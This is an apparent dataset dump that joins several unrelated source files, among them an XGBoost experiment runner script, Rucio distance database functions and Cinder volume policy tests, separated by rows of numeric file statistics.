        self.assertEqual("HELLO, WORLD.", response['response'])
        self.assertTrue(os.path.exists(errors_file))
        self.assertTrue(os.path.exists(duplicates_file))
        self.assertTrue(os.path.exists(conversation_file))
        self.assertTrue(os.path.exists(logs_file))
        request = unittest.mock.Mock()
        # Without a userId, only the user-independent sections appear.
        request.data = b'{}'
        debug_info, _ = client.process_debug_request(request)
        self.assertTrue('errors' in debug_info)
        self.assertTrue('duplicates' in debug_info)
        self.assertFalse('conversations' in debug_info)
        self.assertFalse('logs' in debug_info)
        self.assertFalse('current_conversation' in debug_info)
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
| 39.716876
| 177
| 0.664501
| 3,058
| 28,477
| 6.012753
| 0.081426
| 0.023495
| 0.031326
| 0.051286
| 0.847229
| 0.837276
| 0.822211
| 0.801218
| 0.779192
| 0.773644
| 0
| 0.017428
| 0.216174
| 28,477
| 716
| 178
| 39.772346
| 0.806326
| 0.037293
| 0
| 0.792208
| 0
| 0.012987
| 0.130514
| 0.006276
| 0
| 0
| 0
| 0
| 0.343228
| 1
| 0.070501
| false
| 0
| 0.012987
| 0
| 0.089054
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6aa3f7210e8dcf07da586492ccc5a8925e3f3f87
| 16,046
|
py
|
Python
|
Experiments/XGBoost/Runner_features_analysis_XGBoost_60.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | 3
|
2021-06-29T06:18:18.000Z
|
2021-09-07T03:11:35.000Z
|
Experiments/XGBoost/Runner_features_analysis_XGBoost_60.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | null | null | null |
Experiments/XGBoost/Runner_features_analysis_XGBoost_60.py
|
TempAnonymous/Context_Analysis
|
bbeba1ed7ea7001c22a12721fc4f390d4cc01a6e
|
[
"MIT"
] | null | null | null |
import os
import warnings
warnings.filterwarnings("ignore")
#############################################
# BenchMark Bike
#############################################
#### Chicago
bike_param = {
"closeness_len": 11,
"period_len": 8,
"trend_len": 0,
"max_depth": 4,
"num_boost_round": 35
}
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use not '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use weather '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use weather-holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use weather-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Bike --city Chicago --train_data_length 365 '
'--MergeIndex 1 --external_use weather-holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(bike_param["closeness_len"],bike_param["period_len"],bike_param["trend_len"],bike_param["max_depth"],bike_param["num_boost_round"]))
#############################################
# BenchMark Metro
#############################################
#### Shanghai
metro_param = {
"closeness_len": 3,
"period_len": 7,
"trend_len": 0,
"max_depth": 5,
"num_boost_round": 50
}
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use not '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use holiday-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-holiday-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use holiday-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset Metro --city Shanghai '
'--MergeIndex 1 --external_use weather-holiday-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(metro_param["closeness_len"],metro_param["period_len"],metro_param["trend_len"],metro_param["max_depth"],metro_param["num_boost_round"]))
#############################################
# BenchMark ChargeStation
#############################################
#### Beijing
cs_param = {
"closeness_len": 12,
"period_len": 7,
"trend_len": 0,
"max_depth": 2,
"num_boost_round": 20
}
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use not '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-holiday '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use holiday-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-holiday-tp '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-holiday-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use holiday-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
os.system('python XGBoost_Obj.py --dataset ChargeStation --city Beijing '
'--MergeIndex 1 --MergeWay max --external_use weather-holiday-tp-poi --poi_distance 5000 '
'--closeness_len {} --period_len {} --trend_len {} --max_depth {} --num_boost_round {}'.format(cs_param["closeness_len"],cs_param["period_len"],cs_param["trend_len"],cs_param["max_depth"],cs_param["num_boost_round"]))
| 78.273171
| 242
| 0.685716
| 2,141
| 16,046
| 4.759458
| 0.027557
| 0.097743
| 0.105888
| 0.082434
| 0.977625
| 0.97419
| 0.97419
| 0.97419
| 0.968891
| 0.968891
| 0
| 0.010513
| 0.122647
| 16,046
| 204
| 243
| 78.656863
| 0.713312
| 0.004923
| 0
| 0.701389
| 0
| 0
| 0.670238
| 0.002806
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013889
| 0
| 0.013889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6aa459b191f3f13466fe067db160c274a5faed16
| 315
|
py
|
Python
|
tests/test_repository_owner_is_python_package_owner.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 5
|
2019-09-17T14:46:35.000Z
|
2020-06-06T08:17:02.000Z
|
tests/test_repository_owner_is_python_package_owner.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 2
|
2020-12-18T01:47:55.000Z
|
2020-12-25T10:08:30.000Z
|
tests/test_repository_owner_is_python_package_owner.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | null | null | null |
from setup_python_package.utils.repository_owner_is_python_package_owner import repository_owner_is_python_package_owner
def test_repository_owner_is_python_package_owner():
    """The owner check accepts this project's package and rejects numpy."""
    own_package = repository_owner_is_python_package_owner("setup-python-package")
    assert own_package
    foreign_package = repository_owner_is_python_package_owner("numpy")
    assert not foreign_package
| 63
| 120
| 0.892063
| 45
| 315
| 5.622222
| 0.311111
| 0.359684
| 0.335968
| 0.454545
| 0.6917
| 0.6917
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060317
| 315
| 5
| 121
| 63
| 0.85473
| 0
| 0
| 0
| 0
| 0
| 0.079114
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6ac36a37bce4ddf97c94d96a98102176f019a0ab
| 6,526
|
py
|
Python
|
lib/rucio/core/distance.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | 1
|
2017-08-07T13:34:55.000Z
|
2017-08-07T13:34:55.000Z
|
lib/rucio/core/distance.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | null | null | null |
lib/rucio/core/distance.py
|
balrampariyarath/rucio
|
8a68017af6b44485a9620566f1afc013838413c1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Wen Guan, <wen.guan@cern.ch>, 2015-2016
from sqlalchemy.exc import DatabaseError, IntegrityError
from rucio.common import exception
from rucio.db.sqla.models import Distance
from rucio.db.sqla.session import transactional_session, read_session
@transactional_session
def add_distance(src_rse_id, dest_rse_id, ranking=None, agis_distance=None, geoip_distance=None,
                 active=None, submitted=None, finished=None, failed=None, transfer_speed=None, session=None):
    """
    Add a src-dest distance.

    :param src_rse_id: The source RSE ID.
    :param dest_rse_id: The destination RSE ID.
    :param ranking: Ranking as an integer.
    :param agis_distance: AGIS Distance as an integer.
    :param geoip_distance: GEOIP Distance as an integer.
    :param active: Active FTS transfers as an integer.
    :param submitted: Submitted FTS transfers as an integer.
    :param finished: Finished FTS transfers as an integer.
    :param failed: Failed FTS transfers as an integer.
    :param transfer_speed: FTS transfer speed as an integer.
    :param session: The database session to use.
    :raises Duplicate: if a distance for this src/dest pair already exists.
    :raises RucioException: on any other database error.
    """
    try:
        new_distance = Distance(src_rse_id=src_rse_id, dest_rse_id=dest_rse_id, ranking=ranking,
                                agis_distance=agis_distance, geoip_distance=geoip_distance,
                                active=active, submitted=submitted, finished=finished,
                                failed=failed, transfer_speed=transfer_speed)
        new_distance.save(session=session)
    except IntegrityError:
        raise exception.Duplicate('Distance from %s to %s already exists!' % (src_rse_id, dest_rse_id))
    except DatabaseError as error:
        # 'except E as e' is valid on Python 2.6+ and Python 3; the previous
        # 'except DatabaseError, e' comma form is a SyntaxError on Python 3.
        raise exception.RucioException(error.args)
@transactional_session
def add_distance_short(src_rse_id, dest_rse_id, distance=None, session=None):
    """
    Add a src-dest distance from a dictionary of attributes.

    :param src_rse_id: The source RSE ID.
    :param dest_rse_id: The destination RSE ID.
    :param distance: A dictionary with different values.
    """
    # Forward each known attribute (missing keys default to None), exactly
    # as the explicit keyword list did before.
    keys = ('ranking', 'agis_distance', 'geoip_distance', 'active',
            'submitted', 'finished', 'failed', 'transfer_speed')
    attributes = dict((key, distance.get(key, None)) for key in keys)
    add_distance(src_rse_id, dest_rse_id, session=session, **attributes)
@read_session
def get_distances(src_rse_id=None, dest_rse_id=None, session=None):
    """
    Get distances between rses.

    :param src_rse_id: The source RSE ID (optional filter).
    :param dest_rse_id: The destination RSE ID (optional filter).
    :param session: The database session to use.
    :returns distance: List of dictionaries.
    :raises RucioException: on a database integrity error.
    """
    try:
        query = session.query(Distance)
        if src_rse_id:
            query = query.filter(Distance.src_rse_id == src_rse_id)
        if dest_rse_id:
            query = query.filter(Distance.dest_rse_id == dest_rse_id)
        distances = []
        # Iterating an empty result is a no-op, so no emptiness guard needed.
        for row in query.all():
            row_dict = dict(row)
            # Strip SQLAlchemy's internal bookkeeping attribute before
            # handing the row back to callers.
            row_dict.pop('_sa_instance_state')
            distances.append(row_dict)
        return distances
    except IntegrityError as error:
        # Python 2.6+/3 compatible binding (was 'except IntegrityError, e',
        # which is a SyntaxError on Python 3).
        raise exception.RucioException(error.args)
@transactional_session
def delete_distances(src_rse_id=None, dest_rse_id=None, session=None):
    """
    Delete distances with the given RSE ids.

    :param src_rse_id: The source RSE ID (optional filter).
    :param dest_rse_id: The destination RSE ID (optional filter).
    :param session: The database session to use.
    :raises RucioException: on a database integrity error.
    """
    try:
        query = session.query(Distance)
        if src_rse_id:
            query = query.filter(Distance.src_rse_id == src_rse_id)
        if dest_rse_id:
            query = query.filter(Distance.dest_rse_id == dest_rse_id)
        query.delete()
    except IntegrityError as error:
        # Python 2.6+/3 compatible binding (was 'except IntegrityError, e',
        # which is a SyntaxError on Python 3).
        raise exception.RucioException(error.args)
@transactional_session
def update_distances(src_rse_id=None, dest_rse_id=None, ranking=None, agis_distance=None, geoip_distance=None,
                     active=None, submitted=None, finished=None, failed=None, transfer_speed=None, session=None):
    """
    Update distances with the given RSE ids.

    :param src_rse_id: The source RSE ID (optional filter).
    :param dest_rse_id: The destination RSE ID (optional filter).
    :param ranking: Ranking as an integer.
    :param agis_distance: AGIS Distance as an integer.
    :param geoip_distance: GEOIP Distance as an integer.
    :param active: Active FTS transfers as an integer.
    :param submitted: Submitted FTS transfers as an integer.
    :param finished: Finished FTS transfers as an integer.
    :param failed: Failed FTS transfers as an integer.
    :param transfer_speed: FTS transfer speed as an integer.
    :param session: The database session to use.
    :raises RucioException: on a database integrity error.
    """
    try:
        # NOTE(review): all columns are overwritten, including ones the
        # caller left as None — this mirrors the original behaviour.
        distance = {'ranking': ranking, 'agis_distance': agis_distance, 'geoip_distance': geoip_distance,
                    'active': active, 'submitted': submitted, 'finished': finished, 'failed': failed,
                    'transfer_speed': transfer_speed}
        query = session.query(Distance)
        if src_rse_id:
            query = query.filter(Distance.src_rse_id == src_rse_id)
        if dest_rse_id:
            query = query.filter(Distance.dest_rse_id == dest_rse_id)
        query.update(distance)
    except IntegrityError as error:
        # Python 2.6+/3 compatible binding (was 'except IntegrityError, e',
        # which is a SyntaxError on Python 3).
        raise exception.RucioException(error.args)
@transactional_session
def update_distances_short(src_rse_id=None, dest_rse_id=None, distance=None, session=None):
    """
    Update distances with the given RSE ids from a dictionary of attributes.

    :param src_rse_id: The source RSE ID.
    :param dest_rse_id: The destination RSE ID.
    :param distance: A dictionary with different values.
    """
    # Forward each known attribute (missing keys default to None), exactly
    # as the explicit keyword list did before.
    keys = ('ranking', 'agis_distance', 'geoip_distance', 'active',
            'submitted', 'finished', 'failed', 'transfer_speed')
    attributes = dict((key, distance.get(key, None)) for key in keys)
    update_distances(src_rse_id, dest_rse_id, session=session, **attributes)
| 38.845238
| 156
| 0.690622
| 872
| 6,526
| 4.981651
| 0.139908
| 0.073665
| 0.047882
| 0.058932
| 0.818831
| 0.807551
| 0.79558
| 0.790055
| 0.7843
| 0.756446
| 0
| 0.002933
| 0.216212
| 6,526
| 167
| 157
| 39.077844
| 0.846334
| 0.049341
| 0
| 0.549296
| 0
| 0
| 0.069847
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.056338
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6aed615c6a4d7d3cb0a3f9a1cf9c03e626297c17
| 160
|
py
|
Python
|
seaobs/tests/test_turbulence.py
|
serazing/seaobs
|
99483723b541e738adea4ce497f73d2b5d8e1198
|
[
"MIT"
] | null | null | null |
seaobs/tests/test_turbulence.py
|
serazing/seaobs
|
99483723b541e738adea4ce497f73d2b5d8e1198
|
[
"MIT"
] | null | null | null |
seaobs/tests/test_turbulence.py
|
serazing/seaobs
|
99483723b541e738adea4ce497f73d2b5d8e1198
|
[
"MIT"
] | null | null | null |
from .. import turbulence as turb
def test_structure_function():
    """Placeholder: test for turb.structure_function is not implemented yet."""
    #TODO
    #turb.structure_function()
    pass
def test_inputs_structure_function():
    """Placeholder: presumably meant to exercise the input handling of
    turb.structure_function — not implemented yet."""
    #TODO
    pass
| 13.333333
| 37
| 0.76875
| 21
| 160
| 5.571429
| 0.571429
| 0.435897
| 0.358974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14375
| 160
| 12
| 38
| 13.333333
| 0.854015
| 0.20625
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0
| 1
| 0.4
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
0aa2266c166297935be27de7e2f3252a5bf6f277
| 20,510
|
py
|
Python
|
cinder/tests/unit/policies/test_volume.py
|
xin3liang/cinder
|
61e24eb8ab986f82f4c223fb82062edd489fec15
|
[
"Apache-2.0"
] | 1
|
2020-08-14T02:20:57.000Z
|
2020-08-14T02:20:57.000Z
|
cinder/tests/unit/policies/test_volume.py
|
BelieveInFuture/cinder
|
fff95fa6a68a054488ee087b6e31f4f5e28209dc
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/unit/policies/test_volume.py
|
BelieveInFuture/cinder
|
fff95fa6a68a054488ee087b6e31f4f5e28209dc
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from six.moves import http_client
from cinder.tests.unit import fake_constants
from cinder.tests.unit.policies import test_base
from cinder.volume import api as volume_api
# TODO(yikun): The below policy test cases should be added:
# * HOST_ATTRIBUTE_POLICY
# * MIG_ATTRIBUTE_POLICY
# * ENCRYPTION_METADATA_POLICY
# * MULTIATTACH_POLICY
class VolumePolicyTests(test_base.CinderPolicyTests):
def test_admin_can_create_volume(self):
admin_context = self.admin_context
path = '/v3/%(project_id)s/volumes' % {
'project_id': admin_context.project_id
}
body = {"volume": {"size": 1}}
response = self._get_request_response(admin_context, path, 'POST',
body=body)
self.assertEqual(http_client.ACCEPTED, response.status_int)
def test_nonadmin_user_can_create_volume(self):
user_context = self.user_context
path = '/v3/%(project_id)s/volumes' % {
'project_id': user_context.project_id
}
body = {"volume": {"size": 1}}
response = self._get_request_response(user_context, path, 'POST',
body=body)
self.assertEqual(http_client.ACCEPTED, response.status_int)
def test_admin_can_create_volume_from_image(self):
admin_context = self.admin_context
path = '/v3/%(project_id)s/volumes' % {
'project_id': admin_context.project_id
}
body = {"volume": {"size": 1, "image_id": fake_constants.IMAGE_ID}}
response = self._get_request_response(admin_context, path, 'POST',
body=body)
self.assertEqual(http_client.ACCEPTED, response.status_int)
def test_nonadmin_user_can_create_volume_from_image(self):
user_context = self.user_context
path = '/v3/%(project_id)s/volumes' % {
